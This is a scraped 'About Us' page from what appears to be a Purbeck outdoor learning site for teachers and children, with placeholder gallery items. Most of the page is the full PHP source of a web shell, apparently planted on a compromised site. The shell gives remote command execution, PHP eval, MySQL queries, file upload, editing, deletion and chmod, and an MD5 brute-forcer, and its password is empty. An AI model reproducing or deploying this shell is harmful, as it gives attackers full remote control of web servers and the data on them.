About Us

error_reporting(0); //If there is an error, we'll show it, k?
$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
$me = basename(__FILE__);
$cookiename = "wieeeee";

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
{
$_POST['pass'] = md5($_POST['pass']);
}
if($_POST['pass'] == $password)
{
setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
}
reload();
}

if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
login();
die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
chdir($_GET['dir']);
}

$pages = array(
'cmd' => 'Execute Command',
'eval' => 'Evaluate PHP',
'mysql' => 'MySQL Query',
'chmod' => 'Chmod File',
'phpinfo' => 'PHPinfo',
'md5' => 'md5 cracker',
'headers' => 'Show headers',
'logout' => 'Log out'
);
//The header, like it?
$header = '
'.getenv("HTTP_HOST").'-TH3 GR34T T34M Sh3ll





';
print $header;
$footer = '



IQ-ScuritY Shell


';


//
//Page handling
//
if(isset($_REQUEST['p']))
{
switch ($_REQUEST['p']) {

case 'cmd': //Run command

print "
Command:
";
if(isset($_REQUEST['command']))
{
print "
";

      execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?

     }

   break;

   

   

   case 'edit': //Edit a fie

    if(isset($_POST['editform']))

    {

     $f = $_GET['file'];

     $fh = fopen($f, 'w') or print "Error while opening file!";

     fwrite($fh, $_POST['editform']) or print "Couldn't save file!";

     fclose($fh);

    }

    print "Editing file ".$_GET['file']." (".perm($_GET['file']).")

";

    

   break;

   

   case 'delete': //Delete a file

   

    if(isset($_POST['yes']))

    {

     if(unlink($_GET['file']))

     {

      print "File deleted successfully.";

     }

     else

     {

      print "Couldn't delete file.";

     }

    }

    

    

    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))

    {

     print "Are you sure you want to delete ".$_GET['file']."?


     


     

     

     ";

    }

   

   

   break;

   

   

   case 'eval': //Evaluate PHP code

   

    print "

    


    

    
";

    

    if(isset($_POST['eval']))

    {

     print "
Output:
";

     print "
";

     eval($_POST['eval']);

    }

   

   break;

   

   case 'chmod': //Chmod file

    

    

    print "
Under construction!
";

    if(isset($_POST['chmod']))

    {

    switch ($_POST['chvalue']){

     case 777:

     chmod($_POST['chmod'],0777);

     break;

     case 644:

     chmod($_POST['chmod'],0644);

     break;

     case 755:

     chmod($_POST['chmod'],0755);

     break;

    }

    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";

    }

    if(isset($_GET['file']))

    {

     $content = urldecode($_GET['file']);

    }

    else

    {

     $content = "file/path/please";

    }

    

    print "
File to chmod:

    
New permission:

    ";

    

   break;

   

   case 'mysql': //MySQL Query

   

   if(isset($_POST['host']))

   {

    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());

    mysql_select_db($_POST['dbase']);

    $sql = $_POST['query'];

    

    

    $result = mysql_query($sql);

    

   }

   else

   {

    print "

    This only queries the database, doesn't return data!


    

    Host:



    Username:



    Password:



    Database:



    

    Query:


    

    

    ";

    

   }

   

   break;

   

   case 'createdir':

   if(mkdir($_GET['crdir']))

   {

   print 'Directory created successfully.';

   }

   else

   {

   print 'Couldn\'t create directory';

   }

   break;

   

   

   case 'phpinfo': //PHP Info

    phpinfo();

   break;

   

   

   case 'rename':

   

    if(isset($_POST['fileold']))

    {

     if(rename($_POST['fileold'],$_POST['filenew']))

     {

      print "File renamed.";

     }

     else

     {

      print "Couldn't rename file.";

     }

     

    }

    if(isset($_GET['file']))

    {

     $file = basename(htmlspecialchars($_GET['file']));

    }

    else

    {

     $file = "";

    }

    

    print "Renaming ".$file." in folder ".realpath('.').".


        


     Rename:



     To:



     

     ";

   break;

   

   case 'md5':

   if(isset($_POST['md5']))

   {

   if(!is_numeric($_POST['timelimit']))

   {

   $_POST['timelimit'] = 30;

   }

   set_time_limit($_POST['timelimit']);

    if(strlen($_POST['md5']) == 32)

    {

     

      if($_POST['chars'] == "9999")

      {

      $i = 0;

      while($_POST['md5'] != md5($i) && $i != 100000)

       {

        $i++;

       }

      }

      else

      {

       for($i = "a"; $i != "zzzzz"; $i++)

       {

        if(md5($i == $_POST['md5']))

        {

         break;

        }

       }

      }

     

     if(md5($i) == $_POST['md5'])

     {

       print "
Plaintext of ". $_POST['md5']. " is ".$i."


";

     }

     

    }

    

   }

   

   print "Will bruteforce the md5

    


    md5 to crack:



    Characters:


    Max. cracking time*:



    

    

*: if set_time_limit is allowed by php.ini";

   break;

   

   case 'headers':

   foreach(getallheaders() as $header => $value)

   {

   print htmlspecialchars($header . ":" . $value)."
";

   

   }

   break;

  }

}

else //Default page that will be shown when the page isn't found or no page is selected.

{

 

 $files = array();

 $directories = array();

 

 if(isset($_FILES['uploadedfile']['name']))

{

 $target_path = realpath('.').'/';

 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 

 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {

     print "File:".  basename( $_FILES['uploadedfile']['name']). 

     " has been uploaded";

 } else{

     echo "File upload failed!";

 }

}



 

 

 

 print "";

 if ($handle = opendir('.'))

 {

  while (false !== ($file = readdir($handle))) 

  {

        if(is_dir($file))

     {

    $directories[] = $file;

     }

     else

     {

    $files[] = $file;

     }

  }

 asort($directories);

 asort($files);

  foreach($directories as $file)

  {

   print "";

  }


  foreach($files as $file)

  {

   print "";

  }

 }

 else

 {

  print "Error! Can't open ".realpath('.')."!
";

 }


 print "
OptionsFilenameSizePermissionsLast modified
[R][D]".$file."".perm($file)."".date ("Y/m/d, H:i:s", filemtime($file))."

  [R][D]".$file."".filesize($file)."".perm($file)."".date ("Y/m/d, H:i:s", filemtime($file))."

 


Upload file







Change Directory


Create file



Create directory


";



}



function login()

{

 print "


 
Password?

 

 
";

}

function reload()

{

 header("Location: ".basename(__FILE__));

}

function get_execution_method()

{

 if(function_exists('passthru')){ $m = "passthru"; }

 if(function_exists('exec')){ $m = "exec"; }

 if(function_exists('shell_exec')){ $m = "shell_ exec"; }

 if(function_exists('system')){ $m = "system"; }

 if(!isset($m)) //No method found :-|

 {

  $m = "Disabled";

 }

 return($m);

}

function execute_command($method,$command)

{

 if($method == "passthru")

 {

  passthru($command);

 }

 

 elseif($method == "exec")

 {

  exec($command,$result);

  foreach($result as $output)

  {

   print $output."
";

  }

 }

 

 elseif($method == "shell_exec")

 {

  print shell_exec($command);

 }

 

 elseif($method == "system")

 {

  system($command);

 }

}

function perm($file)

{

 if(file_exists($file))

 {

  return substr(sprintf('%o', fileperms($file)), -4);

 }

 else

 {

  return "????";

 }

}

function get_color($file)

{

if(is_writable($file)) { return "green";}

if(!is_writable($file) && is_readable($file)) { return "white";}

if(!is_writable($file) && !is_readable($file)) { return "red";}

 

}

function show_dirs($where)

{

 if(ereg("^c:",realpath($where)))

 {

 $dirparts = explode('\\',realpath($where));

 }

 else

 {

 $dirparts = explode('/',realpath($where));

 }

 

 

 

 $i = 0;

 $total = "";

 

 foreach($dirparts as $part)

 {

  $p = 0;

  $pre = "";

  while($p != $i)

  {

   $pre .= $dirparts[$p]."/";

   $p++;

   

  }

  $total .= "".$part."/";

  $i++;

 }

 

 return "
".$total."

";

}

print $footer;

// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)

exit();

?>

                                                         


                        

                       	  

                            

								
                                

                                    

                                    	


Item 1 Title


Item 1 Description

Purbeck gallery
Purbeck gallery thumbnail





Item 1 Title


Item 1 Description

Purbeck gallery
Purbeck gallery thumbnail





Item 1 Title


Item 1 Description

Purbeck gallery
Purbeck gallery thumbnail





Item 1 Title


Item 1 Description

Purbeck gallery
Purbeck gallery thumbnail





Item 1 Title


Item 1 Description

Purbeck gallery
Purbeck gallery thumbnail





Item 1 Title


Item 1 Description

Purbeck gallery
Purbeck gallery thumbnail





Item 1 Title


Item 1 Description

Purbeck gallery
Purbeck gallery thumbnail


                                    

                                

                            


                            

                            	        Purbeck Outdoor Learning Centres
                                        Kids Area - Games, Puzzles & More!
                                        The Teachers' Guide to Purbeck